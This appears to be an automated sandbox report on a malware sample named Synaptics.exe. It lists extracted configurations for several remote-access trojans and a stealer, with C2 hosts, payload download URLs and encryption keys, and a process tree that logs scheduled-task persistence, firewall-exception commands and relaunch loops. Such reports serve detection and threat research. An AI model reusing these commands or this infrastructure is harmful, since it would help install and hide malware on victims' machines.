Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-02-2025 09:21

General

  • Target

    Synaptics.exe

  • Size

    764KB

  • MD5

    85e3d4ac5a6ef32fb93764c090ef32b7

  • SHA1

    adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52

  • SHA256

    4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1

  • SHA512

    a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab

  • SSDEEP

    12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

njrat

Version

v2.0

Botnet

HacKed

C2

heo.ddns.net:5552

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

biseo-48321.portmap.host:48321

Mutex

cb74f432-50f1-4947-8163-7687a0292fb0

Attributes
  • encryption_key

    D1BBEF3C04D88FE8F97EE2745041632CE9C760EE

  • install_name

    Svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Svchost

  • subdirectory

    Svchost

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:8080

Mutex

aVbGJnLt4HRONX59

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

hakim32.ddns.net:2000

127.0.0.1:5552

Mutex

a36391a4d2e3933c790f3bc33ca8c666

Attributes
  • reg_key

    a36391a4d2e3933c790f3bc33ca8c666

  • splitter

    |'|'|

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

Mutex

8TdjLZxCzOjI

Attributes
  • delay

    3

  • install

    true

  • install_file

    client.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Botnet

Beyond

Attributes
  • c2_url_file

    https://rentry.co/Spread4Filly/raw

  • delay

    2

  • install

    true

  • install_file

    $77svchost.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://bellflamre.click/api

Extracted

Family

quasar

Version

1.4.1

Botnet

RuntimeBroker

C2

siembonik-44853.portmap.host:44853

Mutex

df483a08-855b-4bf5-bdcb-174788919889

Attributes
  • encryption_key

    A8573AD4438B1D5F6207F7C03CCC7F1E2D4B13DF

  • install_name

    RuntimeBroker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    RuntimeBroker

  • subdirectory

    am1

Extracted

Family

quasar

Version

1.4.1

Botnet

powerstealer

C2

192.168.56.1:4782

Mutex

6760d0e9-9df9-4aba-89be-4e5ce3e92cc8

Attributes
  • encryption_key

    057FCAF700E62ACFECC7338C474084AF9B47ABEB

  • install_name

    powerstealer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Njrat family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 23 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 2 IoCs
  • Downloads MZ/PE file 10 IoCs
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 43 IoCs
  • Loads dropped DLL 31 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Suspicious use of SetThreadContext 1 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 22 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 28 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\Synaptics.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"
      2⤵
      • Downloads MZ/PE file
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2540
      • C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\system32\schtasks.exe
          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2160
        • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
          "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:884
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:968
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\ykNhAdv8d4Im.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1464
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
                PID:2184
              • C:\Windows\system32\PING.EXE
                ping -n 10 localhost
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2472
              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:2632
                • C:\Windows\system32\schtasks.exe
                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2976
                • C:\Windows\system32\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\T7YTma6d44VC.bat" "
                  7⤵
                    PID:2156
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      8⤵
                        PID:604
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        8⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:768
                      • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:308
                        • C:\Windows\system32\schtasks.exe
                          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                          9⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2236
                        • C:\Windows\system32\cmd.exe
                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\Xy59htiiklFl.bat" "
                          9⤵
                            PID:2328
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              10⤵
                                PID:2336
                              • C:\Windows\system32\PING.EXE
                                ping -n 10 localhost
                                10⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:328
                              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                10⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                PID:2280
                                • C:\Windows\system32\schtasks.exe
                                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                  11⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1416
                                • C:\Windows\system32\cmd.exe
                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\wjrShHeoIMEI.bat" "
                                  11⤵
                                    PID:2076
                                    • C:\Windows\system32\chcp.com
                                      chcp 65001
                                      12⤵
                                        PID:2040
                                      • C:\Windows\system32\PING.EXE
                                        ping -n 10 localhost
                                        12⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:2804
                                      • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                        12⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2032
                                        • C:\Windows\system32\schtasks.exe
                                          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                          13⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1600
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\dP5b7a5SAhul.bat" "
                                          13⤵
                                            PID:2744
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              14⤵
                                                PID:2812
                                              • C:\Windows\system32\PING.EXE
                                                ping -n 10 localhost
                                                14⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:2688
                                              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                14⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2912
                                                • C:\Windows\system32\schtasks.exe
                                                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                  15⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2880
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7asy2cNpSiWz.bat" "
                                                  15⤵
                                                    PID:2160
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      16⤵
                                                        PID:1628
                                                      • C:\Windows\system32\PING.EXE
                                                        ping -n 10 localhost
                                                        16⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:2208
                                                      • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                        16⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2756
                                                        • C:\Windows\system32\schtasks.exe
                                                          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                          17⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2884
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\W7mps1gJ7Xcf.bat" "
                                                          17⤵
                                                            PID:2660
                                                            • C:\Windows\system32\chcp.com
                                                              chcp 65001
                                                              18⤵
                                                                PID:528
                                                              • C:\Windows\system32\PING.EXE
                                                                ping -n 10 localhost
                                                                18⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:2512
                                                              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                18⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2784
                                                                • C:\Windows\system32\schtasks.exe
                                                                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                  19⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:584
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\kO8PrGFHyYxU.bat" "
                                                                  19⤵
                                                                    PID:2856
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      20⤵
                                                                        PID:2896
                                                                      • C:\Windows\system32\PING.EXE
                                                                        ping -n 10 localhost
                                                                        20⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:2544
                                                                      • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                        20⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2848
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                          21⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2752
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\9ZS3VC5rIpg0.bat" "
                                                                          21⤵
                                                                            PID:328
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              22⤵
                                                                                PID:2144
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                22⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:2948
                                                                              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                                22⤵
                                                                                • Executes dropped EXE
                                                                                PID:1500
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                                  23⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:808
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Hajd3Dc9REl8.bat" "
                                                                                  23⤵
                                                                                    PID:2944
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      24⤵
                                                                                        PID:1680
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        24⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:1000
                                                                                      • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                                        24⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1884
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                                          25⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:828
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\GNQOOACVrt1S.bat" "
                                                                                          25⤵
                                                                                            PID:1188
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp 65001
                                                                                              26⤵
                                                                                                PID:1300
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping -n 10 localhost
                                                                                                26⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:1112
                                                                                              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                                                26⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1536
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                                                  27⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2656
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YAQ4c7KiKrIt.bat" "
                                                                                                  27⤵
                                                                                                    PID:1608
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 65001
                                                                                                      28⤵
                                                                                                        PID:2592
                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                        ping -n 10 localhost
                                                                                                        28⤵
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        • Runs ping.exe
                                                                                                        PID:2980
                                                                                                      • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                                                        28⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:544
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                                                          29⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:836
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZMAYpey9xIKQ.bat" "
                                                                                                          29⤵
                                                                                                            PID:1700
                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                              chcp 65001
                                                                                                              30⤵
                                                                                                                PID:2392
                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                ping -n 10 localhost
                                                                                                                30⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                • Runs ping.exe
                                                                                                                PID:1216
                                                                                                              • C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
                                                                                                                30⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2432
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
                                                                                                                  31⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:2552
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\556GADH5ij7L.bat" "
                                                                                                                  31⤵
                                                                                                                    PID:1232
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      chcp 65001
                                                                                                                      32⤵
                                                                                                                        PID:2800
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        ping -n 10 localhost
                                                                                                                        32⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:1652
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\srtware.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\srtware.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2844
                                                              • C:\Windows\system32\WerFault.exe
                                                                C:\Windows\system32\WerFault.exe -u -p 2844 -s 196
                                                                4⤵
                                                                • Loads dropped DLL
                                                                PID:2316
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:996
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\trojan.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\trojan.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2112
                                                              • C:\Users\Admin\AppData\Roaming\server.exe
                                                                "C:\Users\Admin\AppData\Roaming\server.exe"
                                                                4⤵
                                                                • Drops startup file
                                                                • Executes dropped EXE
                                                                • Drops autorun.inf file
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2380
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1052
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1436
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2356
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2392
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"' & exit
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:756
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"'
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:988
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp6EE9.tmp.bat""
                                                                4⤵
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2748
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout 3
                                                                  5⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Delays execution with timeout.exe
                                                                  PID:1560
                                                                • C:\Users\Admin\AppData\Roaming\client.exe
                                                                  "C:\Users\Admin\AppData\Roaming\client.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2184
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1452
                                                              • C:\Windows\system32\schtasks.exe
                                                                "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:1560
                                                              • C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe
                                                                "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:292
                                                                • C:\Windows\system32\schtasks.exe
                                                                  "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f
                                                                  5⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2384
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\hKXtIWzqifh9.bat" "
                                                                  5⤵
                                                                    PID:2836
                                                                    • C:\Windows\system32\chcp.com
                                                                      chcp 65001
                                                                      6⤵
                                                                        PID:1540
                                                                      • C:\Windows\system32\PING.EXE
                                                                        ping -n 10 localhost
                                                                        6⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:2072
                                                                      • C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe
                                                                        "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2976
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f
                                                                          7⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1680
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\zl1ZyuSVRGK1.bat" "
                                                                          7⤵
                                                                            PID:2872
